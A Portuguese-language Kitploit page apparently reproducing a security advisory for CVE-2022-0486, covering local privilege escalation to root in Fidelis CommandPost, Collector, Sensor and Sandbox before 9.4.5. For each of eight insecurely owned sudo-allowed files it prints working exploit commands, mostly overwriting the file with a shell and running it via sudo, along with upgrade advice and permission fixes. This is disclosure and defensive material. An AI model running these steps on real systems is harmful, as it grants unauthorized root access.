Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-0486 — Fidelis Network and Deception - Escalação de Privilégios por Permissões de Arquivo Inseguras - Múltiplas | Kitploit
Ferramentas/GitHubGitHub/henryreed/cve-2022-0486
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed TeamingExploração de Binários
GitHubhenryreed/cve-2022-0486

CVE-2022-0486

Fidelis Network and Deception - Escalação de Privilégios por Permissões de Arquivo Inseguras - Múltiplas

Ver Repositório
há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Fidelis Network and Deception - CVE-2022-0486 - Escalação de privilégios por permissões de arquivo inseguras - Múltiplos

Liberação e Agradecimentos

Todos os exploits foram aprovados para divulgação pública pelo Governo dos Estados Unidos. Agradecimentos especiais aos militares e representantes do governo encarregados de aprovar a documentação para distribuição ilimitada. Consulte os seguintes números de OTR:

  • OTR-2022-00482
  • OTR-2022-00483
  • OTR-2022-00484
  • OTR-2022-00485
  • OTR-2022-00486
  • OTR-2022-00488
  • OTR-2022-00489
  • OTR-2022-00490

Metadados

Data: 20220517 2005H UTC

Autor do Exploit: Henry Reed, The Aerospace Corporation

Página inicial do fornecedor: https://fidelissecurity.com/

Versões afetadas:

  • Fidelis CommandPost anterior a 9.4.5
  • Fidelis Collector anterior a 9.4.5
  • Fidelis Sensor anterior a 9.4.5
  • Fidelis Sandbox anterior a 9.4.5

Testado em:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis Sensor (VM Interna) 9.4.3

CVE: CVE-2022-0486

Descrição do CVE: Permissões de arquivo incorretas nos componentes CommandPost, Collector, Sensor e Sandbox do Fidelis Network and Deception permitem que um atacante com acesso local e administrativo à CLI modifique arquivos afetados e possibilite a escalada de privilégios equivalentes ao usuário root. A vulnerabilidade está presente nas versões do Fidelis Network and Deception anteriores a 9.4.5. Patches e atualizações estão disponíveis para corrigir esta vulnerabilidade.

Resumo Executivo

Existem vários exploits sob este CVE, já que o CVE cobre uma série de permissões de arquivo incorretas. Todos os exploits se devem a uma permissão NOPASSWD e a várias permissões sudoers com exigência de senha concedidas ao usuário fidelis em binários ou scripts que pertencem ao usuário fidelis, permitindo assim que o usuário fidelis modifique arbitrariamente o arquivo. Isso permite a escalada local de privilégios.

Arquivo afetado com NOPASSWD:

  • /FSS/bin/shutdown.pl

Arquivos afetados que exigem senha:

  • /FSS/setup/cert_mgmt
  • /FSS/bin/db_updater
  • /FSS/deception-manager/bin/deception-manager
  • /FSS/sbin/fssdbg.sh
  • /FSS/bin/mst
  • /FSS/bin/setup
  • /FSS/setup/unlock_cp_user.sh

Recomenda-se que os usuários afetados do Fidelis Deception ou Fidelis Network atualizem seu software para corrigir esta vulnerabilidade. Também é recomendado a todos os usuários, independentemente de terem sido afetados por esta vulnerabilidade, desabilitar o acesso via shell aos seus produtos Fidelis após a configuração inicial.

Se, por algum motivo, qualquer uma dessas opções não for possível, uma mitigação para cada arquivo vulnerável está descrita neste documento. Até onde os testes do autor alcançaram, parece que os usuários precisarão usar uma dessas vulnerabilidades para escalar privilégios antes de poderem aplicar as mitigações descritas; portanto, atualizar o Fidelis e desabilitar o SSH é fortemente recomendado.

Escalação de privilégios via Shutdown.pl

Testado em:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis Sensor (VM Interna) 9.4.3

Resumo:

Permissões de propriedade mal configuradas em /FSS/bin/shutdown.pl permitem que o usuário fidelis escale privilégios equivalentes ao usuário root em vários produtos Fidelis. Por padrão, a configuração do sudoers permite que o usuário fidelis execute /FSS/bin/shutdown.pl como usuário root sem solicitar senha. O arquivo pertence ao usuário fidelis, permitindo que o usuário fidelis modifique arbitrariamente o script e escale privilégios.

Exploração:

  1. Altere as permissões para permitir a modificação do arquivo shutdown.pl:
root@kitploit:~
$ chmod 700 /FSS/bin/shutdown.pl
  1. Altere o arquivo conforme necessário para executar código arbitrário ou, neste exemplo, abrir um shell:
root@kitploit:~
$ echo '#!/usr/bin/perl -w' > /FSS/bin/shutdown.pl
$ echo "exec '/bin/sh';" >> /FSS/bin/shutdown.pl
$ cat /FSS/bin/shutdown.pl
#!/usr/bin/perl -w
exec '/bin/sh';
  1. Execute o arquivo usando o comando sudo
root@kitploit:~
$ sudo /FSS/bin/shutdown.pl

Captura de tela mostrando a descoberta e exploração da vulnerabilidade. Observe a linha NOPASSWD, que indica que o shutdown.pl é um candidato em potencial para escalada de privilégios:

Mitigação:

Alterar o usuário e o grupo proprietários de /FSS/bin/shutdown.pl para root:fidelis e permitir apenas permissões de leitura e execução ao grupo proprietário de /FSS/bin/shutdown.pl mitigaria esta vulnerabilidade:

Escalação de privilégios autenticada via cert_mgmt

Testado em:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis Sensor (VM Interna) 9.4.3

Resumo:

Permissões de propriedade mal configuradas em /FSS/setup/cert_mgmt permitem que o usuário fidelis escale privilégios equivalentes ao usuário root em vários produtos Fidelis. Por padrão, a configuração do sudoers permite que o usuário fidelis execute /FSS/setup/cert_mgmt como usuário root se uma senha for fornecida. O arquivo pertence ao usuário fidelis, permitindo que o usuário fidelis modifique arbitrariamente o script e escale privilégios.

Exploração:

  1. Altere as permissões para permitir a modificação do arquivo cert_mgmt:
root@kitploit:~
$ chmod u+w /FSS/setup/cert_mgmt
  1. Altere o arquivo conforme necessário para executar código arbitrário ou, neste exemplo, abrir um shell:
root@kitploit:~
$ cp /bin/bash /FSS/setup/cert_mgmt
  1. Execute o arquivo usando o comando sudo e autentique-se com a senha do usuário fidelis:
root@kitploit:~
$ sudo /FSS/setup/cert_mgmt

Captura de tela mostrando a descoberta e exploração da vulnerabilidade:

Mitigação:

Alterar o usuário e o grupo proprietários de /FSS/setup/cert_mgmt para root:fidelis e permitir apenas permissões de leitura e execução ao grupo proprietário de /FSS/setup/cert_mgmt mitigaria esta vulnerabilidade:

Escalação de privilégios autenticada via db_updater

Testado em:

  • Fidelis CommandPost 9.4.3

Resumo:

Permissões de propriedade mal configuradas em /FSS/bin/db_updater permitem que o usuário fidelis escale privilégios equivalentes ao usuário root no Fidelis CommandPost. Por padrão, a configuração do sudoers permite que o usuário fidelis execute /FSS/bin/db_updater como usuário root se uma senha for fornecida. O arquivo pertence ao usuário fidelis, permitindo que o usuário fidelis modifique arbitrariamente o binário e escale privilégios.

Exploração:

  1. Altere as permissões para permitir a modificação do arquivo db_updater:
root@kitploit:~
$ chmod u+w /FSS/bin/db_updater
  1. Altere o arquivo conforme necessário para executar código arbitrário ou, neste exemplo, abrir um shell:
root@kitploit:~
$ cp /bin/bash /FSS/bin/db_updater
  1. Execute o arquivo usando o comando sudo e autentique-se com a senha do usuário fidelis:
root@kitploit:~
$ sudo /FSS/bin/db_updater

Mitigação:

Alterar o usuário e o grupo proprietários de /FSS/bin/db_updater para root:fidelis e permitir apenas permissões de leitura e execução ao grupo proprietário de /FSS/bin/db_updater mitigaria esta vulnerabilidade:

Escalação de privilégios autenticada via deception-manager

Testado em:

  • Fidelis CommandPost 9.4.3

Resumo:

Permissões de propriedade mal configuradas em /FSS/deception-manager/bin/deception-manager permitem que o usuário fidelis escale privilégios equivalentes ao usuário root no Fidelis CommandPost. Por padrão, a configuração do sudoers permite que o usuário fidelis execute /FSS/deception-manager/bin/deception-manager como usuário root se uma senha for fornecida. O arquivo pertence ao usuário fidelis, permitindo que o usuário fidelis modifique arbitrariamente o binário e escale privilégios.

Exploração:

  1. Altere o arquivo conforme necessário para executar código arbitrário ou, neste exemplo, abrir um shell:
root@kitploit:~
$ cp /bin/bash /FSS/deception-manager/bin/deception-manager
  1. Execute o arquivo usando o comando sudo e autentique-se com a senha do usuário fidelis:
root@kitploit:~
$ sudo /FSS/deception-manager/bin/deception-manager

Captura de tela mostrando a descoberta e exploração da vulnerabilidade:

Mitigação:

Alterar o usuário e o grupo proprietários de /FSS/deception-manager/bin/deception-manager para root:fidelis e permitir apenas permissões de leitura e execução ao grupo proprietário de /FSS/deception-manager/bin/deception-manager mitigaria esta vulnerabilidade:

Escalação de privilégios autenticada via fssdbg.sh

Testado em:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis Sensor (VM Interna) 9.4.3

Resumo:

Permissões de propriedade mal configuradas em /FSS/sbin/fssdbg.sh permitem que o usuário fidelis escale privilégios equivalentes ao usuário root em vários produtos Fidelis. Por padrão, a configuração do sudoers permite que o usuário fidelis execute /FSS/sbin/fssdbg.sh como usuário root se uma senha for fornecida. O arquivo pertence ao usuário fidelis, permitindo que o usuário fidelis modifique arbitrariamente o script e escale privilégios.

Exploração:

  1. Altere as permissões para permitir a modificação do arquivo fssdbg.sh:
root@kitploit:~
$ chmod u+w /FSS/sbin/fssdbg.sh
  1. Altere o arquivo conforme necessário para executar código arbitrário ou, neste exemplo, abrir um shell:
root@kitploit:~
$ cp /bin/bash /FSS/sbin/fssdbg.sh
  1. Execute o arquivo usando o comando sudo e autentique-se com a senha do usuário fidelis:
root@kitploit:~
$ sudo /FSS/sbin/fssdbg.sh

Captura de tela mostrando a descoberta e exploração da vulnerabilidade:

Mitigação:

Alterar o usuário e o grupo proprietários de /FSS/sbin/fssdbg.sh para root:fidelis e permitir apenas permissões de leitura e execução ao grupo proprietário de /FSS/sbin/fssdbg.sh mitigaria esta vulnerabilidade:

Escalação de privilégios autenticada via mst

Testado em:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis Sensor (VM Interna) 9.4.3

Resumo:

Permissões de propriedade mal configuradas em /FSS/bin/mst permitem que o usuário fidelis escale privilégios equivalentes ao usuário root em vários produtos Fidelis. Por padrão, a configuração do sudoers permite que o usuário fidelis execute /FSS/bin/mst como usuário root se uma senha for fornecida. O arquivo pertence ao usuário fidelis, permitindo que o usuário fidelis modifique arbitrariamente o binário e escale privilégios.

Exploração:

  1. Altere as permissões para permitir a modificação do arquivo mst:
root@kitploit:~
$ chmod u+w /FSS/bin/mst
  1. Altere o arquivo conforme necessário para executar código arbitrário ou, neste exemplo, abrir um shell:
root@kitploit:~
$ cp /bin/bash /FSS/bin/mst
  1. Execute o arquivo usando o comando sudo e autentique-se com a senha do usuário fidelis:
root@kitploit:~
$ sudo /FSS/bin/mst

Captura de tela mostrando a descoberta e exploração da vulnerabilidade:

Mitigação:

Alterar o usuário e o grupo proprietários de /FSS/bin/mst para root:fidelis e permitir apenas permissões de leitura e execução ao grupo proprietário de /FSS/bin/mst mitigaria esta vulnerabilidade. A seguir, uma captura de tela mostrando a mitigação da escalada de privilégios e um trecho da saída do comando mst quando executado por fidelis sem sudo:

Captura de tela mostrando que, mesmo com a mitigação, o comando ainda pode ser executado como sudo pelo usuário fidelis:

Captura de tela mostrando que o mst não pode ser modificado para executar outro código arbitrário quando a mitigação é usada:

Escalação de privilégios autenticada via setup

Testado em:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis Sensor (VM Interna) 9.4.3

Resumo:

Permissões de propriedade mal configuradas em /FSS/bin/setup permitem que o usuário fidelis escale privilégios equivalentes ao usuário root em vários produtos Fidelis. Por padrão, a configuração do sudoers permite que o usuário fidelis execute /FSS/bin/setup como usuário root se uma senha for fornecida. O arquivo pertence ao usuário fidelis, permitindo que o usuário fidelis modifique arbitrariamente o binário e escale privilégios.

Exploração:

  1. Altere as permissões para permitir a modificação do arquivo setup:
root@kitploit:~
$ chmod u+w /FSS/bin/setup
  1. Altere o arquivo conforme necessário para executar código arbitrário ou, neste exemplo, abrir um shell:
root@kitploit:~
$ cp /bin/bash /FSS/bin/setup
  1. Execute o arquivo usando o comando sudo e autentique-se com a senha do usuário fidelis:
root@kitploit:~
$ sudo /FSS/bin/setup

Captura de tela mostrando a descoberta e exploração da vulnerabilidade:

Mitigação:

Alterar o usuário e o grupo proprietários de /FSS/bin/setup para root:fidelis e permitir apenas permissões de leitura e execução ao grupo proprietário de /FSS/bin/setup mitigaria esta vulnerabilidade:

Escalação de privilégios autenticada via setup

Testado em:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis Sensor (VM Interna) 9.4.3

Resumo:

Permissões de propriedade mal configuradas em /FSS/setup/unlock_cp_user.sh permitem que o usuário fidelis escale privilégios equivalentes ao usuário root em vários produtos Fidelis. Por padrão, a configuração do sudoers permite que o usuário fidelis execute /FSS/setup/unlock_cp_user.sh como usuário root se uma senha for fornecida. O arquivo pertence ao usuário fidelis, permitindo que o usuário fidelis modifique arbitrariamente o script e escale privilégios.

Exploração:

  1. Altere as permissões para permitir a modificação do arquivo unlock_cp_user.sh:
root@kitploit:~
$ chmod u+w /FSS/setup/unlock_cp_user.sh
  1. Altere o arquivo conforme necessário para executar código arbitrário ou, neste exemplo, abrir um shell:
root@kitploit:~
$ cp /bin/bash /FSS/setup/unlock_cp_user.sh
  1. Execute o arquivo usando o comando sudo e autentique-se com a senha do usuário fidelis:
root@kitploit:~
$ sudo /FSS/setup/unlock_cp_user.sh

Captura de tela mostrando a descoberta e exploração da vulnerabilidade:

Mitigação:

Alterar o usuário e o grupo proprietários de /FSS/setup/unlock_cp_user.sh para root:fidelis e permitir apenas permissões de leitura e execução ao grupo proprietário de /FSS/setup/unlock_cp_user.sh mitigaria esta vulnerabilidade:

Baixar ferramenta